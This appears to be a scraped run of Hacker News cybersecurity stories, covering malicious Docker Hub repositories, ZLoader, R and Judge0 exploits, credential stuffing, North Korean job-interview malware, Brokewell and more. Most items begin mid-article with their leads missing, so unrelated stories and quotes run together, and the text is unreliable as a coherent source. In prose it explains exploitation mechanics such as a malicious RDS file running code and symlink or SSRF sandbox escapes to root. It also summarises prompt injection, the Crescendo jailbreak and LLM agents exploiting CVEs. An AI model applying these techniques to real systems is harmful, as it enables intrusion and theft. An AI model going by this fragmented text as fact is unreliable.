"Over four million of the repositories in Docker Hub are imageless and have no
content except for the repository documentation," JFrog security researcher
Andrey Polkovnichenko said in a report shared with The Hacker News.
What's more, the documentation has no connection whatsoever to the container.
Instead, it's a web page that's designed to lure users into visiting phishing or
malware-hosting websites.
Of the 4.6 million imageless Docker Hub repositories uncovered, 2.81 million of
them are said to have been used as landing pages to redirect unsuspecting users
to fraudulent sites as part of three broad campaigns -
Downloader (repositories created in the first half of 2021 and September 2023),
which advertises links to purported pirated content or cheats for video games
but either directly links to malicious sources or a legitimate one that, in
turn, contains JavaScript code that redirects to the malicious payload after 500
milliseconds. E-book phishing (repositories created in mid-2021), which
redirects users searching for e-books to a website ("rd.lesac.ru") that, in
turn, urges them to enter their financial information to download the e-book.
Website (thousands of repositories created daily from April 2021 to October
2023), which contains a link to an online diary-hosting service called Penzu in
some cases, or a harmless piece of text, suggesting that it could have been used
during early testing phases. The payload delivered as part of the downloader
campaign is designed to contact a command-and-control (C2) server and transmit
system metadata, following which the server responds with a link to cracked
software.
It's suspected that the attacks may be part of a larger malware operation, which
could involve adware or monetization schemes that derive monetary benefit out of
distributing third-party software.
On the other hand, the exact goal of the website cluster is currently unclear,
with the campaign also propagated on sites that have a lax content moderation
policy.
JFrog said it counted a total of 208,739 fake accounts that the threat actors
used to create the malicious and unwanted repositories. Docker has since taken
down all of them following responsible disclosure.
"The most concerning aspect of these three campaigns is that there is not a lot
that users can do to protect themselves at the outset, other than exercising
caution," Shachar Menashe, senior director of security research at JFrog, said
in a statement shared with The Hacker News.
"We're essentially looking at a malware playground that in some cases has been
three years in the making. These threat actors are highly motivated and are
hiding behind the credibility of the Docker Hub name to lure victims."
With threat actors taking painstaking efforts to poison well known utilities, as
evidenced in the case of the XZ Utils compromise, it's imperative that
developers exercise caution when it comes to downloading packages from
open-source ecosystems/
"As Murphy's Law suggests, if something can be exploited by malware developers,
it inevitably will be, so we expect that these campaigns can be found in more
repositories than just Docker Hub," Menashe said.
"The latest version, 2.4.1.0, introduces a feature to prevent execution on
machines that differ from the original infection," Zscaler ThreatLabz researcher
Santiago Vicente said in a technical report. "A similar anti-analysis feature
was present in the leaked ZeuS 2.X source code, but implemented differently."
ZLoader, also called Terdot, DELoader, or Silent Night, emerged after a nearly
two-year hiatus around September 2023 following its takedown in early 2022.
A modular trojan with capabilities to load next-stage payloads, recent versions
of the malware have added RSA encryption as well as updates to its domain
generation algorithm (DGA).
The latest sign of ZLoader's evolution comes in the form of an anti-analysis
feature that restricts the binary's execution to the infected machine.
The feature, present in artifacts with versions greater than 2.4.1.0, causes the
malware to abruptly terminate if they are copied and executed on another system
post-initial infection. This is accomplished by means of a Windows Registry
check for a specific key and value.
"The Registry key and value are generated based on a hardcoded seed that is
different for each sample," Vicente said.
"If the Registry key/value pair is manually created (or this check is patched),
ZLoader will successfully inject itself into a new process. However, it will
terminate again after executing only a few instructions. This is due to a
secondary check in ZLoader's MZ header."
This means that ZLoader's execution will be stalled in a different machine
unless the seed and MZ header values are set correctly and all the Registry and
disk paths/names from the originally compromised system are replicated.
Zscaler said the technique used by Zloader to store the installation information
and avoid being run on a different host shares similarities with ZeuS version
2.0.8, albeit implemented in a different manner, which relied on a data
structure called PeSettings to store the configuration instead of the Registry.
"In recent versions, ZLoader has adopted a stealthy approach to system
infections," Vicente said. "This new anti-analysis technique makes ZLoader even
more challenging to detect and analyze."
The development comes as threat actors are utilizing fraudulent websites hosted
on popular legitimate platforms like Weebly to spread stealer malware and steal
data via black hat search engine optimization (SEO) techniques.
"This catapults their fraudulent site to the top of a user's search results,
increasing the likelihood of inadvertently selecting a malicious site and
potentially infecting their system with malware," Zscaler researcher Kaivalya
Khursale said.
A notable aspect of these campaigns is that the infection only proceeds to the
payload delivery stage if the visit originates from search engines like Google,
Bing, DuckDuckGo, Yahoo, or AOL, and if bogus sites are not accessed directly.
Over the past two months, email-based phishing campaigns have also been observed
targeting organizations in the U.S., Turkey, Mauritius, Israel, Russia, and
Croatia with Taskun malware, which acts as a facilitator for Agent Tesla, per
findings from Veriti.
"This sentence should serve as a stark warning to all those entrusted with
protecting national defense information that there are consequences to betraying
that trust," said FBI Director Christopher Wray.
Jareh Sebastian Dalke, 32, of Colorado Springs was employed as an Information
Systems Security Designer between June 6 to July 1, 2022, during which time he
had access to sensitive information.
Despite his short tenure at the intelligence agency, Dalke is said to have made
contact with a person he thought was a Russian agent sometime between August and
September of that year. In reality, the person was an undercover agent working
for the Federal Bureau of Investigation (FBI).
To demonstrate his "legitimate access and willingness to share," he then emailed
the purported Russian agent snippets of three top-secret National Defense
Information (NDI) documents that were obtained during his employment using an
encrypted email account.
Dalke, who demanded $85,000 in return for sharing all the files in his
possession, claimed the information would be of value to Russia and told his
contact that he would share more documents upon his return to Washington, D.C.
He was subsequently arrested on September 28, 2022, shortly after he transferred
five files to the supposed Russian spy at Union Station in downtown Denver via a
laptop computer. The defendant pleaded guilty to the crime in October 2023.
"As part of his plea agreement, Dalke admitted that he willfully transmitted
files to the FBI online covert employee with the intent and reason to believe
the information would be used to injure the United States and to benefit
Russia," the U.S. Justice Department said.
"These guidelines are informed by the whole-of-government effort to assess AI
risks across all sixteen critical infrastructure sectors, and address threats
both to and from, and involving AI systems," the Department of Homeland Security
(DHS) said Monday.
In addition, the agency said it's working to facilitate safe, responsible, and
trustworthy use of the technology in a manner that does not infringe on
individuals' privacy, civil rights, and civil liberties.
The new guidance concerns the use of AI to augment and scale attacks on critical
infrastructure, adversarial manipulation of AI systems, and shortcomings in such
tools that could result in unintended consequences, necessitating the need for
transparency and secure by design practices to evaluate and mitigate AI risks.
Specifically, this spans four different functions such as govern, map, measure,
and manage all through the AI lifecycle -
Establish an organizational culture of AI risk management Understand your
individual AI use context and risk profile Develop systems to assess,
analyze, and track AI risks Prioritize and act upon AI risks to safety and
security "Critical infrastructure owners and operators should account for
their own sector-specific and context-specific use of AI when assessing AI risks
and selecting appropriate mitigations," the agency said.
"Critical infrastructure owners and operators should understand where these
dependencies on AI vendors exist and work to share and delineate mitigation
responsibilities accordingly."
The development arrives weeks after the Five Eyes (FVEY) intelligence alliance
comprising Australia, Canada, New Zealand, the U.K., and the U.S. released a
cybersecurity information sheet noting the careful setup and configuration
required for deploying AI systems.
"The rapid adoption, deployment, and use of AI capabilities can make them highly
valuable targets for malicious cyber actors," the governments said.
"Actors, who have historically used data theft of sensitive information and
intellectual property to advance their interests, may seek to co-opt deployed AI
systems and apply them to malicious ends."
The recommended best practices include taking steps to secure the deployment
environment, review the source of AI models and supply chain security, ensure a
robust deployment environment architecture, harden deployment environment
configurations, validate the AI system to ensure its integrity, protect model
weights, enforce strict access controls, conduct external audits, and implement
robust logging.
Earlier this month, the CERT Coordination Center (CERT/CC) detailed a
shortcoming in the Keras 2 neural network library that could be exploited by an
attacker to trojanize a popular AI model and redistribute it, effectively
poisoning the supply chain of dependent applications.
Recent research has found AI systems to be vulnerable to a wide range of prompt
injection attacks that induce the AI model to circumvent safety mechanisms and
produce harmful outputs.
"Prompt injection attacks through poisoned content are a major security risk
because an attacker who does this can potentially issue commands to the AI
system as if they were the user," Microsoft noted in a recent report.
One such technique, dubbed Crescendo, has been described as a multiturn large
language model (LLM) jailbreak, which, like Anthropic's many-shot jailbreaking,
tricks the model into generating malicious content by "asking carefully crafted
questions or prompts that gradually lead the LLM to a desired outcome, rather
than asking for the goal all at once."
LLM jailbreak prompts have become popular among cybercriminals looking to craft
effective phishing lures, even as nation-state actors have begun weaponizing
generative AI to orchestrate espionage and influence operations.
Even more concerningly, studies from the University of Illinois Urbana-Champaign
has discovered that LLM agents can be put to use to autonomously exploit one-day
vulnerabilities in real-world systems simply using their CVE descriptions and
"hack websites, performing tasks as complex as blind database schema extraction
and SQL injections without human feedback."
"The law, known as the Product Security and Telecommunications Infrastructure
act (or PSTI act), will help consumers to choose smart devices that have been
designed to provide ongoing protection against cyber attacks," the NCSC said.
To that end, manufacturers are required to not supply devices that use guessable
default passwords, provide a point of contact to report security issues, and
state the duration for which their devices are expected to receive important
security updates.
Default passwords can not only be easily found online, they also act as a vector
for threat actors to log in to devices for follow-on exploitation. That said, a
unique default password is permissible under the law.
The law, which aims to enforce a set of minimum security standards across the
board and prevent vulnerable devices from being corralled into a DDoS botnet
like Mirai, applies to the following products that can be connected to the
internet -
Smart speakers, smart TVs, and streaming devices Smart doorbells, baby
monitors, and security cameras Cellular tablets, smartphones, and game
consoles Wearable fitness trackers (including smart watches) Smart
domestic appliances (such as light bulbs, plugs, kettles, thermostats, ovens,
fridges, cleaners, and washing machines) Companies that fail to adhere to the
provisions of the PSTI act are liable to face recalls and monetary penalties,
attracting fines of up to £10 million ($12.5 million) or 4% of their global
annual revenues, depending on whichever is higher.
The development makes the U.K. the first country in the world to outlaw default
usernames and passwords from IoT devices. According to Cloudflare's DDoS threat
report for Q1 2024, Mirai-based attacks continue to be prevalent despite the
original botnet being taken down in 2016.
"Four out of every 100 HTTP DDoS attacks, and two out of every 100 L3/4 DDoS
attacks are launched by a Mirai-variant botnet," Omer Yoachimik and Jorge
Pacheco said. "The Mirai source code was made public, and over the years there
have been many permutations of the original."
It also follows a $196 million fine issued by the U.S. Federal Communications
Commission (FCC) against telecom carriers AT&T ($57 million), Sprint ($12
million), T-Mobile ($80 million), and Verizon ($47 million) for illegally
sharing customers' real-time location data without their consent to aggregators
like LocationSmart and Zumigo, who then sold the information to third-party
location-based service providers.
"No one who signed up for a cell plan thought they were giving permission for
their phone company to sell a detailed record of their movements to anyone with
a credit card," U.S. Senator Ron Wyden, who revealed the practice in 2018, said
in a statement.
The tech giant also said it blocked 333,000 bad accounts from the app storefront
in 2023 for attempting to distribute malware or for repeated policy violations.
"In 2023, we prevented 2.28 million policy-violating apps from being published
on Google Play in part thanks to our investment in new and improved security
features, policy updates, and advanced machine learning and app review
processes," Google's Steve Kafka, Khawaja Shams, and Mohet Saxena said.
"To help safeguard user privacy at scale, we partnered with SDK providers to
limit sensitive data access and sharing, enhancing the privacy posture for over
31 SDKs impacting 790K+ apps."
In comparison, Google fended off 1.43 million bad apps from being published to
the Play Store in 2022, alongside banning 173,000 bad accounts over the same
time period.
In addition, the Mountain View-based firm said it strengthened its developer
onboarding and review processes, requiring them to furnish more identity
information and complete a verification process when setting up their Play
Console developer accounts.
This, the company noted, enables it to better understand the developer community
and root out bad actors from gaming the system to propagate malicious apps.
The development comes as Google is taking a series of steps to secure the
Android ecosystem. Last November, it moved the App Defense Alliance (ADA), which
it launched in November 2019, under the Linux Foundation umbrella, with Meta and
Microsoft joining as the founding steering members.
Around the same time, the company also rolled out real-time scanning at the code
level to tackle novel Android malware and an "Independent security review" badge
in the Play Store's Data safety section for VPN apps that have undergone a
Mobile Application Security Assessment (MASA) audit.
On the user-facing side of things, Google has also taken the step of taking down
approximately 1.5 million applications from the Play Store that do not target
the most recent APIs.
Google's ongoing fight to tackle malicious actors on Android coincides with a
lawsuit filed by the company in the U.S. against two China-based fraudsters who
are alleged to have engaged in an international online consumer investment fraud
scheme and tricked users into downloading fake apps from the Play Store and
other sources and ultimately stealing their funds.
Cloud security firm Infoblox described the threat actor as likely affiliated
with the People's Republic of China (PRC) with the ability to control the Great
Firewall (GFW), which censors access to foreign websites and manipulates
internet traffic to and from the country.
The moniker is reference to the "bewildering" nature of their operations and the
actor's abuse of DNS open resolvers – which are DNS servers that accept
recursive queries from all IP addresses – to send queries from the Chinese IP
space.
"Muddling Meerkat demonstrates a sophisticated understanding of DNS that is
uncommon among threat actors today – clearly pointing out that DNS is a powerful
weapon leveraged by adversaries," the company said in a report shared with The
Hacker News.
More specifically, it entails triggering DNS queries for mail exchange (MX) and
other record types to domains not owned by the actor but which reside under
well-known top-level domains such as .com and .org.
Infoblox, which discovered the threat actor from anomalous DNS MX record
requests that were sent to its recursive resolvers by customer devices, said it
detected over 20 such domains -
"Muddling Meerkat elicits a special kind of fake DNS MX record from the Great
Firewall which has never been seen before," Dr. Renée Burton, vice president of
threat intelligence for Infoblox, told The Hacker News. "For this to happen,
Muddling Meerkat must have a relationship with the GFW operators."
"The target domains are the domain used in the queries, so it is not necessarily
the target of an attack. It is the domain used to carry out the probe attack.
These domains are not owned by Muddling Meerkat."
It's known that the GFW relies on what's called DNS spoofing and tampering to
inject fake DNS responses containing random real IP addresses when a request
matches a banned keyword or a blocked domain.
In other words, when a user attempts to search for a blocked keyword or phrase,
the GFW blocks or redirects the website query in a manner that will prevent the
user from accessing the requested information. This is achieved via techniques
like DNS cache poisoning or IP address blocking.
This also means that if the GFW detects a query to a blocked website, the
sophisticated tool injects a bogus DNS reply with an invalid IP address, or an
IP address to a different domain, effectively corrupting the cache of recursive
DNS servers located within its borders.
"The most remarkable feature of Muddling Meerkat is the presence of false MX
record responses from Chinese IP addresses," Burton said. "This behavior [...]
differs from the standard behavior of the GFW."
"These resolutions are sourced from Chinese IP addresses that do not host DNS
services and contain false answers, consistent with the GFW. However, unlike the
known behavior of the GFW, Muddling Meerkat MX responses include not IPv4
addresses but properly formatted MX resource records instead."
The exact motivation behind the multi-year activity is unclear, although it
raised the possibility that it may be undertaken as part of an internet mapping
effort or research of some kind.
"Muddling Meerkat is a Chinese nation-state actor performing deliberate and
highly skilled DNS operations against global networks on an almost daily basis –
and the full scope of their operation can not be seen in any one location,"
Burton said.
"Malware is easier than DNS in this sense – once you locate the malware, it is
straightforward to understand it. Here, we know something is happening, but
don't understand it fully. CISA, the FBI, and other agencies continue to warn of
Chinese prepositioning operations that are undetected. We should be worried
about anything we can't fully see or understand."
The flaw, assigned the CVE identifier CVE-2024-27322 (CVSS score: 8.8),
"involves the use of promise objects and lazy evaluation in R," AI application
security company HiddenLayer said in a report shared with The Hacker News.
RDS, like pickle in Python, is a format used to serialize and save the state of
data structures or objects in R, an open-source programming language used in
statistical computing, data visualization, and machine learning.
This process of serialization – serialize() or saveRDS() – and deserialization –
unserialize() and readRDS() – is also leveraged when saving and loading R
packages.
The root cause behind CVE-2024-27322 lies in the fact that it could lead to
arbitrary code execution when deserializing untrusted data, thus leaving users
exposed to supply chain attacks through specially crafted R packages.
An attacker looking to weaponize the flaw could therefore take advantage of the
fact that R packages leverage the RDS format to save and load data, causing
automatic code execution when the package is decompressed and deserialized.
"R packages are vulnerable to this exploit and can, therefore, be used as part
of a supply chain attack via package repositories," security researchers Kasimir
Schulz and Kieran Evans said. "For an attacker to take over an R package, all
they need to do is overwrite the rdx file with the maliciously crafted file, and
when the package is loaded, it will automatically execute the code."
The security defect has been addressed in version 4.4.0 released on April 24,
2024, following responsible disclosure.
"An attacker can exploit this [flaw] by crafting a file in RDS format that
contains a promise instruction setting the value to unbound_value and the
expression to contain arbitrary code," HiddenLayer said. "Due to lazy
evaluation, the expression will only be evaluated and run when the symbol
associated with the RDS file is accessed."
"Therefore if this is simply an RDS file, when a user assigns it a symbol
(variable) in order to work with it, the arbitrary code will be executed when
the user references that symbol. If the object is compiled within an R package,
the package can be added to an R repository such as CRAN, and the expression
will be evaluated and the arbitrary code run when a user loads that package."
Update# The CERT Coordination Center (CERT/CC) has released an advisory for
CVE-2024-27322, noting that the flaw could be exploited to achieve arbitrary
code execution on the victim's target device via malicious RDS or rdx files.
"An attacker can create malicious .rds and .rdx files and use social engineering
to distribute those files to execute arbitrary code on the victim's device,"
CERT/CC said. "Projects that use readRDS on untrusted files are also vulnerable
to the attack."
The three flaws, all critical in nature, allow an "adversary with sufficient
access to perform a sandbox escape and obtain root permissions on the host
machine," Australian cybersecurity firm Tanto Security said in a reportreport
published today.
Judge0 (pronounced "judge zero") is described by its maintainers as a "robust,
scalable, and open-source online code execution system" that can be used to
build applications that require online code execution features such as candidate
assessment, e-learning, and online code editors and IDEs.
According to its website, the service is used by 23 customers like AlgoDaily,
CodeChum, and PYnative, among others. The project has been forked 412 times on
GitHub to date.
The flaws, discovered and reported by Daniel Cooper in March 2024, are listed
below -
CVE-2024-28185 (CVSS score: 10.0) - The application does not account for
symlinks placed inside the sandbox directory, which can be leveraged by an
attacker to write to arbitrary files and gain code execution outside of the
sandbox. CVE-2024-28189 (CVSS score: 10.0) - A patch bypass for
CVE-2024-28185 that stems from the use of the UNIX chown command on an untrusted
file within the sandbox. An attacker can abuse this by creating a symbolic link
(symlink) to a file outside the sandbox, allowing the attacker to run chown on
arbitrary files outside of the sandbox. CVE-2024-29021 (CVSS score: 9.1) -
The default configuration of Judge0 leaves the service vulnerable to a sandbox
escape via Server-Side Request Forgery (SSRF). This allows an attacker with
sufficient access to the Judge0 API to obtain unsandboxed code execution as root
on the target machine. The problem is rooted in a Ruby script named
"isolate_job.rb," which is responsible for setting up the sandbox, as well
running the code and storing the results of the execution.
Specifically, it entails creating a symbolic link in the directory before a bash
script is set up to execute the program based on the submission language such
that it allows writing to an arbitrary file on the unsandboxed system.
A threat actor could leverage this flaw to overwrite scripts on the system and
gain code execution outside of the sandbox and on the Docker container running
the submission job.
What's more, the attacker could escalate their privileges outside of the Docker
container due to it being run using the privileged flag as specified in
docker-compose.yml.
"This will allow the attacker to mount the Linux host filesystem and the
attacker can then write files (for example a malicious cron job) to gain access
to the system," Judge0's Herman Došilović said.
"From this point the attacker will have complete access to the Judge0 system
including the database, internal networks, the Judge0 web server, and any other
applications running on the Linux host."
CVE-2024-29021, on the other hand, has to do with a configuration that permits
communicating with Judge0's PostgreSQL database available inside the internal
Docker network, thus enabling the adversary to weaponize the SSRF to connect to
the database and change the datatype of relevant columns and ultimately gain
command injection.
Following responsible disclosure, the shortcomings have been addressed in
version 1.13.1 released on April 18, 2024. Users of Judge0 are advised to update
to the latest version to mitigate potential threats.
These unprecedented attacks, observed over the last month, are said to be
facilitated by "the broad availability of residential proxy services, lists of
previously stolen credentials ('combo lists'), and scripting tools," the company
said in an alert published Saturday.
The findings build on a recent advisory from Cisco, which cautioned of a global
surge in brute-force attacks targeting various devices, including Virtual
Private Network (VPN) services, web application authentication interfaces, and
SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of
other anonymizing tunnels and proxies," Talos noted at the time, adding targets
of the attacks comprise VPN appliances from Cisco, Check Point, Fortinet,
SonicWall, as well as routers from Draytek, MikroTik, and Ubiquiti.
Okta said its Identity Threat Research detected an uptick in credential stuffing
activity against user accounts from April 19 to April 26, 2024, from likely
similar infrastructure.
Credential stuffing is a type of cyber attack in which credentials obtained from
a data breach on one service are used to attempt to sign in to another unrelated
service.
Alternatively, such credentials could be extracted via phishing attacks that
redirect victims to credential harvesting pages or through malware campaigns
that install information stealers on compromised systems.
"All recent attacks we have observed share one feature in common: they rely on
requests being routed through anonymizing services such as TOR," Okta said.
"Millions of the requests were also routed through a variety of residential
proxies including NSOCKS, Luminati, and DataImpulse."
Residential proxies (RESIPs) refer to networks of legitimate user devices that
are misused to route traffic on behalf of paying subscribers without their
knowledge or consent, thereby allowing threat actors to conceal their malicious
traffic.
This is typically achieved by installing proxyware tools on computers, mobile
phones, or routers, effectively enrolling them into a botnet that's then rented
to customers of the service who desire to anonymize the source of their traffic.
"Sometimes a user device is enrolled in a proxy network because the user
consciously chooses to download 'proxyware' into their device in exchange for
payment or something else of value," Okta explained.
"At other times, a user device is infected with malware without the user's
knowledge and becomes enrolled in what we would typically describe as a botnet."
Last month, HUMAN's Satori Threat Intelligence team revealed over two dozen
malicious Android VPN apps that turn mobile devices into RESIPs by means of an
embedded software development kit (SDK) that included the proxyware
functionality.
"The net sum of this activity is that most of the traffic in these credential
stuffing attacks appear to originate from the mobile devices and browsers of
everyday users, rather than from the IP space of VPS providers," Okta said.
To mitigate the risk of account takeovers, the company is recommending that
organizations enforce users to switch to strong passwords, enable two-factor
authentication (2FA), deny requests originating from locations where they don't
operate and IP addresses with poor reputation, and add support for passkeys.
Cybersecurity researchers have discovered a targeted operation against Ukraine
that has been found leveraging a nearly seven-year-old flaw in Microsoft Office
to deliver Cobalt Strike on compromised systems.
The attack chain, which took place at the end of 2023 according to Deep
Instinct, employs a PowerPoint slideshow file ("signal-2023-12-20-160512.ppsx")
as the starting point, with the filename implying that it may have been shared
via the Signal instant messaging app.
That having said, there is no actual evidence to indicate that the PPSX file was
distributed in this manner, even though the Computer Emergency Response Team of
Ukraine (CERT-UA) has uncovered two different campaigns that have used the
messaging app as a malware delivery vector in the past.
Just last week, the agency disclosed that Ukrainian armed forces are being
increasingly targeted by the UAC-0184 group via messaging and dating platforms
to serve malware like HijackLoader (aka GHOSTPULSE and SHADOWLADDER), XWorm, and
Remcos RAT, as well as open-source programs such as sigtop and tusc to
exfiltrate data from computers.
"The PPSX (PowerPoint slideshow) file appears to be an old instruction manual of
the U.S. Army for mine clearing blades (MCB) for tanks," security researcher
Ivan Kosarev said. "The PPSX file includes a remote relationship to an external
OLE object."
This involves the exploitation of CVE-2017-8570 (CVSS score: 7.8), a now-patched
remote code execution bug in Office that could allow an attacker to perform
arbitrary actions upon convincing a victim to open a specially crafted file, to
load a remote script hosted on weavesilk[.]space.
The heavily obfuscated script subsequently launches an HTML file containing
JavaScript code, which, in turn, sets up persistence on the host via Windows
Registry and drops a next-stage payload that impersonates the Cisco AnyConnect
VPN client.
The payload includes a dynamic-link library (DLL) that ultimately injects a
cracked Cobalt Strike Beacon, a legitimate pen-testing tool, directly into
system memory and awaits for further instructions from a command-and-control
(C2) server ("petapixel[.]fun").
The DLL also packs in features to check if it's being executed in a virtual
machine and evade detection by security software.
Deep Instinct said it could neither link the attacks to a specific threat actor
or group nor exclude the possibility of a red teaming exercise. Also unclear is
the exact end goal of the intrusion.
"The lure contained military-related content, suggesting it was targeting
military personnel," Kosarev said.
"But the domain names weavesilk[.]space and petapixel[.]fun are disguised as an
obscure generative art site (weavesilk[.]com) and a popular photography site
(petapixel[.]com). These are unrelated, and it's a bit puzzling why an attacker
would use these specifically to fool military personnel."
Sandworm Targets Critical Infra in Ukraine# The disclosure comes as CERT-UA
revealed that about 20 energy, water, and heating suppliers in Ukraine have been
targeted by a Russian state-sponsored group called UAC-0133, a sub-cluster
within Sandworm (aka APT44, FROZENBARENTS, Seashell Blizzard, UAC-0002, and
Voodoo Bear), which is responsible for a bulk of all the disruptive and
destructive operations against the country.
The attacks, which aimed to sabotage critical operations, involve the use of
malware like Kapeka (aka ICYWELL, KnuckleTouch, QUEUESEED, and wrongsens) and
its Linux variant BIASBOAT, in addition to GOSSIPFLOW and LOADGRIP.
While GOSSIPFLOW is a Golang-based SOCKS5 proxy, LOADGRIP is an ELF binary
written in C that's used to load BIASBOAT on compromised Linux hosts.
Sandworm is a prolific and highly adaptive threat group linked to Unit 74455
within the Main Directorate of the General Staff of the Armed Forces of the
Russian Federation (GRU). It's known to be active since at least 2009, with the
adversary also tied to three hack-and-leak hacktivist personas such as XakNet
Team, CyberArmyofRussia_Reborn, and Solntsepek.
"Sponsored by Russian military intelligence, APT44 is a dynamic and
operationally mature threat actor that is actively engaged in the full spectrum
of espionage, attack, and influence operations," Mandiant said, describing the
advanced persistent threat (APT) as engaged in a multi-pronged effort to help
Russia gain a wartime advantage since January 2022.
"APT44 operations are global in scope and mirror Russia's wide ranging national
interests and ambitions. Patterns of activity over time indicate that APT44 is
tasked with a range of different strategic priorities and is highly likely seen
by the Kremlin as a flexible instrument of power capable of serving both
enduring and emerging intelligence requirements."
Cybersecurity firm Securonix is tracking the activity under the name DEV#POPPER,
linking it to North Korean threat actors.
"During these fraudulent interviews, the developers are often asked to perform
tasks that involve downloading and running software from sources that appear
legitimate, such as GitHub," security researchers Den Iuzvyk, Tim Peck, and Oleg
Kolesnikov said. "The software contained a malicious Node JS payload that, once
executed, compromised the developer's system."
Details of the campaign first emerged in late November 2023, when Palo Alto
Networks Unit 42 detailed an activity cluster dubbed Contagious Interview in
which the threat actors pose as employers to lure software developers into
installing malware such as BeaverTail and InvisibleFerret through the interview
process.
Then earlier this February, software supply chain security firm Phylum uncovered
a set of malicious packages on the npm registry that delivered the same malware
families to siphon sensitive information from compromised developer systems.
It's worth noting that Contagious Interview is said to be disparate from
Operation Dream Job (aka DeathNote or NukeSped), with Unit 42 telling The Hacker
News that the former is "focused on targeting developers, mainly through fake
identities in freelance job portals, and the next stages involve the use of
developer tools and npm packages leading to [...] BeaverTail and
InvisibleFerret."
Operation Dream Job, linked to the prolific Lazarus Group from North Korea, is a
long-running offensive campaign that sends unsuspecting professionals employed
in various sectors like aerospace, cryptocurrency, defense, and others malicious
files dressed as job offers to distribute malware.
First uncovered by Israeli cybersecurity firm ClearSky at the start of 2020, it
also exhibits overlaps with two other Lazarus clusters known as Operation
In(ter)ception and Operation North Star.
The attack chain detailed by Securonix starts with a ZIP archive hosted on
GitHub that's likely sent to the target as part of the interview. Present within
the file is a seemingly innocuous npm module that harbors a malicious JavaScript
file codenamed BeaverTail that acts as an information stealer and a loader for a
Python backdoor called InvisibleFerret that's retrieved from a remote server.
The implant, besides gathering system information, is capable of command
execution, file enumeration and exfiltration, and clipboard and keystroke
logging.
The development is a sign that North Korean threat actors continue to hone a
raft of weapons for their cyber attack arsenal, consistently updating their
tradecraft with improved abilities to hide their actions and blend in on host
systems and networks, not to mention siphon off data and turn compromises into
financial gain.
"When it comes to attacks which originate through social engineering, it's
critical to maintain a security-focused mindset, especially during intense and
stressful situations like job interviews," Securonix researchers said.
"The attackers behind the DEV#POPPER campaigns abuse this, knowing that the
person on the other end is in a highly distracted and in a much more vulnerable
state."
The 18 flaws impact all versions up to and including 2.3.0, according to
independent security researcher Pierre Barre, who discovered and reported them.
The issues range from incorrect firewall rules, insecure root access, and Docker
misconfigurations to lack of authentication and encryption, thus allowing an
attacker to intercept credentials, overwrite arbitrary files, and completely
breach the device.
Some of the most severe flaws are listed below -
CVE-2024-2859 (CVSS score: 8.8) - A vulnerability that could allow an
unauthenticated, remote attacker to log in to an affected device using the root
account and execute arbitrary commands CVE-2024-29960 (CVSS score: 7.5) - The
use of hard-coded SSH keys in the OVA image, which could be exploited by an
attacker to decrypt the SSH traffic to the SANnav appliance and compromise it.
CVE-2024-29961 (CVSS score: 8.2) - A vulnerability that can allow an
unauthenticated, remote attacker to stage a supply chain attack by taking
advantage of the fact the SANnav service sends ping commands in the background
at periodic intervals to the domains gridgain[.]com and ignite.apache[.]org to
check for updates CVE-2024-29963 (CVSS score: 8.6) - The use of hard-coded
Docker keys in SANnav OVA to reach remote registries over TLS, thereby allowing
an attacker to carry out adversary-in-the-middle (AitM) attack on the traffic
CVE-2024-29966 (CVSS score: 7.5) - The presence of hard-coded credentials for
root users in publicly-available documentation that could permit an
unauthenticated attacker full access to the Brocade SANnav appliance.
Following responsible disclosure twice in August 2022 and May 2023, the flaws
have been addressed in SANnav version 2.3.1 released in December 2023. Brocade's
parent company Broadcom, which also owns Symantec and VMware, released
advisories for the flaws earlier this month.
Hewlett Packard Enterprise has also shipped patches for a subset of these
vulnerabilities in HPE SANnav Management Portal versions 2.3.0a and 2.3.1 as of
April 18, 2024.
"Brokewell is a typical modern banking malware equipped with both data-stealing
and remote-control capabilities built into the malware," Dutch security firm
ThreatFabric said in an analysis published Thursday.
The malware is said to be in active development, adding new commands to capture
touch events, textual information displayed on screen, and the applications a
victim launches.
The list of Brokewell apps that masquerade as Google Chrome, ID Austria, and
Klarna is as follows -
jcwAz.EpLIq.vcAZiUGZpK (Google Chrome) zRFxj.ieubP.lWZzwlluca (ID Austria)
com.brkwl.upstracking (Klarna) Like other recent Android malware families of
its kind, Brokewell is capable of getting around restrictions imposed by Google
that prevent sideloaded apps from requesting accessibility service permissions.
The banking trojan, once installed and launched for the first time, prompts the
victim to grant permissions to the accessibility service, which it subsequently
uses to automatically grant other permissions and carry out various malicious
activities.
This includes displaying overlay screens on top of targeted apps to pilfer user
credentials. It can also steal cookies by launching a WebView and loading the
legitimate website, after which the session cookies are intercepted and
transmitted to an actor-controlled server.
Some of the other features of Brokewell include the ability to record audio,
take screenshots, retrieve call logs, access device location, list installed
apps, record every every event happening on the device, send SMS messages, do
phone calls, install and uninstall apps, and even disable the accessibility
service.
The threat actors can also leverage the malware's remote control functionality
to see what's displayed on screen in real-time, as well as interact with the
device through clicks, swipes, and touches.
Brokewell is said to be the work of a developer who goes by the name "Baron
Samedit Marais" and manages the "Brokewell Cyber Labs" project, which also
includes an Android Loader publicly hosted on Gitea.
The loader is designed to act as a dropper that bypasses accessibility
permissions restrictions in Android versions 13, 14, and 15 using a technique
previously adopted by dropper-as-a-service (DaaS) offerings like SecuriDropper
and deploy the trojan implant.
By default, the loader apps generated through this process have the package name
"com.brkwl.apkstore," although this can configured by the user by either
providing a specific name or enabling the random package name generator.
The free availability of the loader means it could be embraced by other threat
actors looking to sidestep Android's security protections.
"Second, existing 'Dropper-as-a-Service' offerings that currently provide this
capability as a distinctive feature will likely either close their services or
attempt to reorganize," ThreatFabric said.
"This further lowers the entry barrier for cybercriminals looking to distribute
mobile malware on modern devices, making it easier for more actors to enter the
field."
Update# A Google spokesperson shared the below statement with The Hacker News
-
"Android users are automatically protected against known versions of this
malware by Google Play Protect, which is on by default on Android devices with
Google Play Services. Google Play Protect can warn users or block apps known to
exhibit malicious behavior, even when those apps come from sources outside of
Play."
The vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), could be
weaponized to obtain unauthenticated remote shell command execution on
susceptible devices. It has been addressed in multiple versions of PAN-OS
10.2.x, 11.0.x, and 11.1.x.
There is evidence to suggest that the issue has been exploited as a zero-day
since at least March 26, 2024, by a threat cluster tracked as UTA0218.
The activity, codenamed Operation MidnightEclipse, entails the use of the flaw
to drop a Python-based backdoor called UPSTYLE that's capable of executing
commands transmitted via specially crafted requests.
The intrusions have not been linked to a known threat actor or group, but it's
suspected to be a state-backed hacking crew given the tradecraft and the
victimology observed.
The latest remediation advice offered by Palo Alto Networks is based on the
extent of compromise -
